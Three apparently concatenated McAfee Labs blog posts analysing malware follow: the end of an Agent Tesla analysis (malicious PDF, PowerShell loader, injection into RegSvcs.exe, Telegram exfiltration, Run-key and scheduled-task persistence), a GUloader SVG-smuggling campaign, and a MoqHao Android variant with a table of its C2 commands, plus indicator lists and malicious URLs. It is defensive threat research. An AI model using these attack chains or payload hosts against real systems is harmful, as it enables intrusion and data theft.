• Additionally, the variable “muthal,” marked as variable 1 in Figure 11, is utilized within this script rather than in the main .ps1 file.
• Furthermore, another variable is defined, and its content is stored in the variable “pinchs.”
• Finally, the content of both variables, “muthal” and “pinchs,” is decrypted using the decryption function “kimkarden” and stored as byte arrays in data 1 and data 2, marked as 5 and 6, respectively, in Figure 13.
• Data 1 and Data 2 are found to be .NET executables

The next section marked Blue in Figure 13, does the following:

• After a brief sleep, the script loads an assembly using the decoded content, data 1, and executes a command through reflection.
• The script defines a function named ExecuteCommand, which utilizes reflection to dynamically invoke method ‘C’ from a type named ‘A.B’ loaded from an assembly.
• It defines paths to various .NET framework executables (RegSvcs.exe for versions 2.0 and 4.0, and Msbuild.exe for version 3.5).
• It invokes the $invokeMethod with the $nullArray and parameters: the path of .NET framework executables and $data2 (decoded byte array).

Process Injection:

Figure 15: Data 1

Data 1 comprises a .NET DLL file. As previously indicated, the script invokes the method ‘C’ from the type named ‘A.B’. Despite the high level of obfuscation in the file shown in Figure 15, the presence of method ‘C’ can be observed (highlighted in yellow). Additionally, within the script, there is a specific function where the path to framework executables and data are being passed (highlighted within the red box).

Figure 16: Data 1 dll

This DLL is responsible for injecting data2, which is Agent Tesla, as a payload into the Regsvcs.exe process. The following figure shows the configuration of data2. The depicted configuration of data2 disguises it as a legitimate McAfee package file shown in Figure 16. However, it lacks a valid certificate, indicating its fraudulent nature.

Figure 17: Data2

The executable file exhibits a high degree of obfuscation, rendering its content largely unreadable. Numerous methods are present, each bearing meaningless names, a deliberate tactic employed to impede analysis by researchers.

Figure 18: Data2 exe

Discovery:

The attackers have intricately orchestrated the obfuscation process. Each string undergoes decryption through a series of instructions, with specific parameters being passed to obtain the deciphered content. This meticulous approach is designed to add layers of complexity and hinder straightforward analysis. For instance, in Figure 18, through reverse engineering, we can observe how it begins querying the browser for information. The highlighted instruction is the one which after decrypting gives the path of the Opera browser.

Figure 19: Fetching browser information

The following ProcMon logs show all the broswers the malware queried:

Figure 20: Procmon logs of browsers(1)

Figure 21: Procmons logs for browsers(2)

Credential Access:

In addition to this, it steals sensitive information such as browser history, cookies, credentials, SMTP information, session information, and email client data such as Otlook profiles, etc.

Figure 22: Credentials

Exfiltration:

Through debugging the code, we were able to uncover the domain it was utilizing for exfiltration. The following figure shows the URL used for exfiltration:

Figure 23: Domain obtained

The same was evident from Procmon logs shown in the Figure below:

Figure 24: Procmon logs of Connection for exfiltration

The DNS record of IP address 149.154.167.220 belongs to Telegram messenger.

Figure 25: DNS record

AgentTesla leverages Telegram bots for data exfiltration due to several advantageous factors. Firstly, Telegram provides robust end-to-end encryption, ensuring the security of transmitted data. Secondly, the platform offers anonymity for bot creators, enhancing the stealth of malicious activities. Thirdly, Telegram’s user-friendly interface simplifies communication processes for both attackers and their command-and-control infrastructure. Additionally, since Telegram is a widely used messaging platform, traffic to its servers may appear less suspicious compared to other channels, aiding in evading detection. Moreover, Telegram’s infrastructure resilience makes it a reliable option for maintaining communication channels even amidst takedown efforts.

Overall, the combination of security, anonymity, ease of use, stealth, and resilience makes Telegram bots an appealing choice for AgentTesla’s data exfiltration tactics. And to achieve this, it establishes contact with the respective domain associated with the bot and transmits the data, which is then tracked by a specific bot ID.

Figure 26: TelegramBot for exfiltration

In a nutshell, this script was tasked with decoding the payload, retrieving legitimate .NET executable paths, performing process injection to execute the malware, collecting data, and ultimately exfiltrating the acquired information.

Persistence:

Moving forward with atom.ps1 (Figure 11), the next is variable 4, labeled as “koaskodkwllWWW”, and is decrypted using the function “asceeeeeeeeeeeeeeee”. Upon decryption, the content is decoded as follows:

Figure 27: Variable 4 decoded

This script establishes persistence by:

1. Creating an HTA script to execute PowerShell commands fetched remotely. The script incorporates JavaScript code that utilizes ActiveX objects to execute commands. Specifically, it creates an instance of WScript.Shell to run a PowerShell command fetched from a remote location (linkcomsexi).
2. It registers a scheduled task named “Tnamesexi” utilizing Register-ScheduledTask. The task is set to trigger once at a specific time, calculated by adding a certain number of minutes (mynsexi) to the current time.
3. Lastly, it sets a registry value under the current user’s Run key (HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run). This registry value, named “Tnamesexi,” is configured to execute the command schtasks /run /tn $taskName, thereby manually triggering the scheduled task established in the preceding step.

Ultimately, the content highlighted in green in Figure 11 performs the final task. The instructions are as follows:

Figure 28: Persistence instructions

Now, after substituting the values:

• “mynsexi” is set to “213”, indicating that the script will be executed again after 213 minutes.
• “Tnamesexi” is defined as “chromeupdateri”, implying that a Run entry will be created under this name.
• “linkcomsexi” is assigned the value “htljan62024.blogspot.com//////////atom.xml”, suggesting that the atom.ps1 file will be fetched again from this URL.

We inspected registry entries and scheduled task entries for cross-verification. And the script did as directed:

Figure 29: Registry entry for Persistence

Figure 30: Task Scheduler

Figure 31: Procmon logs for persistence

In summary, the script is configured to execute again after 213 minutes, creating a Run entry named “chromeupdateri” and fetching the atom.ps1 file again from “htljan62024.blogspot.com//////////atom.xml”.

Execution with old and unpatched version of Acrobat Reader:

Upon opening the PDF in the old, unpatched version of Acrobat Reader, a prompt immediately appeared indicating the launch of MSHTA along with the entire JavaScript code contained therein. This is depicted in the figure below.

Figure 32: Prompt for embedded javascript

Upon examining the streams of the PDF, we discovered the identical script embedded within the document:

Figure 33: Embedded javascript in PDF

After the launch of MSHTA, an instance of PowerShell is invoked, initiating process injection into Regsvcs.exe and injection of AgentTesla. Consequently, utilizing an old and unpatched version of Acrobat Reader, interaction with the PDF is unnecessary; mere opening of the PDF file results in system infection by the malware.

Summary:

The chain of events initiates with the delivery of a PDF file containing malicious content. Upon opening the PDF, the embedded malicious code triggers the execution of a JavaScript payload, leading to the download and execution of a PowerShell script. This PowerShell script then decrypts and executes a binary, in the form of a .NET DLL file, which injects AgentTesla payload into legitimate processes to evade detection. The malware communicates with command-and-control servers, exfiltrating sensitive data through Telegram bots for stealthy transmission. To ensure persistence, the malware establishes scheduled tasks and registry entries, allowing it to execute periodically and maintain its presence on the infected system. In the old version of Acrobat Reader, opening the PDF triggered the automatic execution of malicious JavaScript, leading to the injection of AgentTesla malware via PowerShell into Regsvcs.exe. Inspection of the PDF streams revealed the embedded script, further confirming the exploitation of vulnerabilities without requiring user interaction. This orchestrated sequence underscores the sophisticated nature of the attack, spanning from initial infection to data exfiltration and persistent infiltration, posing significant challenges for detection and mitigation efforts.

Mitigation:

Avoiding falling victim to email phishing involves adopting a vigilant and cautious approach. Here are some common practices to help prevent falling prey to email phishing:

• Verify Sender Information
• Think Before Clicking Links and Warnings
• Check for Spelling and Grammar Errors
• Be Cautious with Email Content
• Verify Unusual Requests
• Use Email Spam Filters
• Check for Secure HTTP Connections
• Delete Suspicious Emails
• Keep Windows and Security Software Up to date
• Use the latest and patched version of Acrobat reader

Indicators of Compromise (IOCs)

PDF	8f8264c173e6d036e87b706dbb87e3036ae17df32e53a683c87bff94fce2c242
Javascript	3ea81c292f36f2583d2291e8a393014da62767447dba7b139a6c45574647aa2b
ps1 file	db726e060f4feccf4bdfa843e3c10cbac80509585fd55c6d1bfce5e312a4e429
dll	5b6d8f91201ba9c879e46062190817954e28ceb61a67e55870bb61d1960854ee
exe	dec2ce698ab8600d96dd3353b5e47d802441c6df18aed1dd6a2b78311369659e
IPv4	149.154.167.220
URL	http://htloctmain25.blogspot[.]com/atom.xml
URL	https://bio0king[.]blogspot[.]com

Table 1: Indicators of Compromise

 

 

 

 

The post Rise in Deceptive PDF: The Gateway to Malicious Payloads appeared first on McAfee Blog.

GUloader Unmasked: Decrypting the Threat of Malicious SVG Files

Authored by: Vignesh Dhatchanamoorthy

In the ever-evolving landscape of cybersecurity threats, staying ahead of malicious actors requires a deep understanding of their tactics and tools. Enter GUloader, a potent weapon in the arsenal of cybercriminals worldwide. This sophisticated malware loader has garnered attention for its stealthy techniques and ability to evade detection, posing a significant risk to organizations and individuals.

One of GUloader’s distinguishing features is its utilization of evasion techniques, making it particularly challenging for traditional security measures to detect and mitigate. Through polymorphic code and encryption, GUloader can dynamically alter its structure, effectively masking its presence from antivirus software and intrusion detection systems. This adaptability enables GUloader to persistently infiltrate networks and establish footholds for further malicious activity.

McAfee Labs has observed a recent GUloader campaign being distributed through a malicious SVG file delivered via email.

Scalable Vector Graphics (SVG)

The SVG (Scalable Vector Graphics) file format is a widely used vector image format designed for describing two-dimensional vector and mixed vector/raster graphics in XML. One of the key features of SVG files is their support for interactivity and animation, achieved through JavaScript and CSS.

Modern web browsers such as Google Chrome, Mozilla Firefox, and Microsoft Edge have built-in support for rendering SVG files. When you open an SVG file in Chrome or Firefox, the browser renders the vector graphics using its built-in SVG rendering engine. This engine interprets the XML-based SVG code and displays the image accordingly on the web page.

Browsers treat SVG files as standard web content and handle them seamlessly within their browsing environments.

Execution Chain

Figure 1: Infection chain

The execution process begins with the opening of an SVG file from an email attachment. This action triggers the browser to download a ZIP file. Within this ZIP file is a WSF (Windows Script File), acting as the conduit for the subsequent stage. Upon execution of the WSF, wscript calls the PowerShell command to establish a connection with a malicious domain and execute the hosted content. This content includes shellcode injected into the MSBuild application, facilitating further malicious actions.

Figure 2: Process Tree

Technical Analysis

A recipient receives a spam email that contains malware embedded in archived attachments. The attachment contains a malicious SVG file named “dhgle-Skljdf.svg”

Figure 3: Spam Email

JavaScript that was smuggled inside of the SVG image contained the entire malicious zip archive. When the victim opened the attachment from the email the smuggled JavaScript code inside the SVG image created a malicious zip archive, and then presented the user with a dialog box to decrypt and save the file.

Figure 4: Saving file prompt

The SVG file utilizes a Blob object that contains the embedded zip file in base64 format. Subsequently, the zip file is dropped via the browser when accessed.

Figure 5: SVG file code

Inside the zip file, there is an obfuscated WSF (Windows Script File). The WSF script employs several techniques to make analysis quite difficult.

Figure 6: Obfuscated WSF Script

It invokes PowerShell to establish a connection with a malicious domain, subsequently executing the hosted content retrieved from it.

Encoded PowerShell

Figure 7: Encoded PowerShell code

After Decoding

Figure 8: Decoded PowerShell code

URL: hxxps://winderswonders.com/JK/Equitably.mix

The URL hosts base64-encoded content, which, after decoding, contains shellcode and a PowerShell script.

Hosted Content

Figure 9: Hosted Base64 content

After decoding Base64

Figure 10: Decoded Base64 content

The above PowerShell script attempts to load the shellcode into the legitimate MSBuild process using the Process Hollowing technique.

After injection, the shellcode executes anti-analysis check then it modifies the Registry run key to achieve persistence.

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

The final stage uses the injected shellcode to download and execute the final malicious executable. GuLoader can also download and deploy a wide range of other malware variants.

 

Indicator of Compromise (IOCs)

File	SHA256/URL
Email	66b04a8aaa06695fd718a7d1baa19386922b58e797634d5ac4ff96e79584f5c1
SVG	b20ea4faca043274bfbb1f52895c02a15cd0c81a333c40de32ed7ddd2b9b60c0
WSF	0a196171571adc8eb9edb164b44b7918f83a8425ec3328d9ebbec14d7e9e5d93
URL	hxxps://winderswonders[.]com/JK/Equitably[.]mix

The post GUloader Unmasked: Decrypting the Threat of Malicious SVG Files appeared first on McAfee Blog.

MoqHao evolution: New variants start automatically right after installation

Authored by Dexter Shin 

MoqHao is a well-known Android malware family associated with the Roaming Mantis threat actor group first discovered in 2015. McAfee Mobile Research Team has also posted several articles related to this malware family that traditionally targets Asian countries such as Korea and Japan. 

 Recently McAfee Mobile Research Team found that MoqHao began distributing variants using very dangerous technique. Basically, the distribution method is the same. They send a link to download the malicious app via the SMS message. Typical MoqHao requires users to install and launch the app to get their desired purpose, but this new variant requires no execution. While the app is installed, their malicious activity starts automatically. This technique was introduced in a previous post but the difference is that this dangerous technique is now being abused by other well-known active malware campaigns like MoqHao. We have already reported this technique to Google and they are already working on the implementation of mitigations to prevent this type of auto-execution in a future Android version. Android users are currently protected by Google Play Protect, which is on by default on Android devices with Google Play Services. Google Play Protect can warn users or block apps known to exhibit malicious behavior, even when those apps come from sources outside of Play. McAfee Mobile Security detects this threat as Android/MoqHao. 

How it is distributed 

MoqHao is distributed via phishing SMS messages (also known as Smishing). When a user receives an SMS message containing a malicious link and clicks it, the device downloads the malicious application. Phishing messages are almost the same as in previous campaigns: 

Figure 1. Smishing message impersonating a notification from a courier service. 

One noticeable change is that they now use URL shortener services. If the malware authors use their own domain, it can be quickly blocked but if they use legitimate URL shortener services, it is difficult to block the short domain because it could affect all the URLs used by that service. When a user clicks on the link in the message, it will be redirected to the actual malicious site by the URL shortener service. 

What is new in this variant 

As mentioned at the beginning, this variant behaves differently from previous ones. Typical MoqHao must be launched manually by the user after it is installed but this variant launches automatically after installation without user interaction: 

Figure 2. Differences between typical MoqHao and Modern MoqHao

We explained this auto-execution technique in detail in a previous post but to briefly summarize it here, Android is designed so when an app is installed and a specific value used by the app is set to be unique, the code runs to check whether the value is unique upon installation. This feature is the one that is being abused by the highly active Trojan family MoqHao to auto-execute itself without user interaction. The distribution, installation, and auto-execution of this recent MoqHao variant can be seen in the following video: 

 

On the other hand, this recent MoqHao variant uses Unicode strings in app names differently than before. This technique makes some characters appear bold, but users visually recognize it as “Chrome”. This may affect app name-based detection techniques that compare app name (Chrome) and package name (com.android.chrome): 

Figure 3. App name using Unicode strings.

 

Additionally, they also use social engineering techniques to set malicious apps as the default SMS app. Before the settings window appears, they show a message telling you to set up the app to prevent spam, but this message is fake: 

Figure 4. Fake message using social engineering techniques. 

 

Also, the different languages used in the text associated with this behavior suggests that, in addition to Japan, they are also targeting South Korea, France, Germany, and India: 

Figure 5. Fake messages designed to target different countries.

 

After the initialization of the malware is completed, it will create a notification channel that will be used to display phishing messages: 

Figure 6. Create a notification channel for the next phishing attack.

 

The malware checks the device’s carrier and uses this notification to send phishing messages accordingly to trick users into clicking on them. MoqHao gets the phishing message and the phishing URL from Pinterest profiles.  

 

Figure 7. Phishing message and URL in Pinterest profile

 

If the phishing string is empty, MoqHao will use the phishing message in the code: 

Figure 8. Phishing notification code for each carrier

 

This variant also connects to the C2 server via WebSocket. However, it has been confirmed that several other commands have been added in addition to the commands introduced in the previous post: 

Command	Description
getSmsKW	Send all SMS messages to C2 server
sendSms	Send SMS messages to someone
setWifi	Enable/disable Wifi
gcont	Send whole contacts to C2 server
lock	Store Boolean value in “lock” key in SharedPreferences
bc	Check SIM state
setForward	Store String value in “fs” key in SharedPreferences
getForward	Get String value in “fs” key in SharedPreferences
hasPkg	Check specific package installed on device
setRingerMode	Set Sound/Vibrate/Silent mode
setRecEnable	Set Vibrate/Silent mode according to SDK version
reqState	Send device information (Network, Power, MAC, Permission) to C2 server
showHome	Emulate Home button click
getnpki	Send Korean Public Certificate (NPKI) to C2 server
http	Send HTTP requests
call	Call a specific number with Silent mode
get_apps	Get list of installed packages
ping	Check C2 server status
getPhoneState	Get unique information such as IMEI, SIM number, Android ID, and serial number
get_photo	Send all photos to C2 server

MoqHao malware family is an active malware that has been around for years. Although many years have passed, they are using more and more different ways to hide and reach users. We are seeing a much higher number of C2 commands than in previous, the active use of legitimate sites like Pinterest to store and update phishing data, and code with the potential to target Asian countries like Japan and South Korea, as well as countries like France, Germany, and India. Moreover, we expect this new variant to be highly impactful because it infects devices simply by being installed without execution. 

 It is difficult for general users to find fake apps using legitimate icons and application names, so we recommend users to install secure software to protect their devices. For more information, visit McAfee Mobile Security. 

Indicators of Compromise (IOCs) 

SHA256	Application Name	Package Name
2576a166d3b18eafc2e35a7de3e5549419d10ce62e0eeb24bad5a1daaa257528	chrome	gb.pi.xcxr.xd
61b4cca67762a4cf31209056ea17b6fb212e175ca330015d804122ee6481688e	chrome	malmkb.zdbd.ivakf.lrhrgf
b044804cf731cd7dd79000b7c6abce7b642402b275c1eb25712607fc1e5e3d2b	chrome	vfqhqd.msk.xux.njs
bf102125a6fca5e96aed855b45bbed9aa0bc964198ce207f2e63a71487ad793a	chrome	hohoj.vlcwu.lm.ext
e72f46f15e50ce7cee5c4c0c5a5277e8be4bb3dd23d08ea79e1deacb8f004136	chrome	enech.hg.rrfy.wrlpp
f6323f8d8cfa4b5053c65f8c1862a8e6844b35b260f61735b3cf8d19990fef42	chrome	gqjoyp.cixq.zbh.llr

 

The post MoqHao evolution: New variants start automatically right after installation appeared first on McAfee Blog.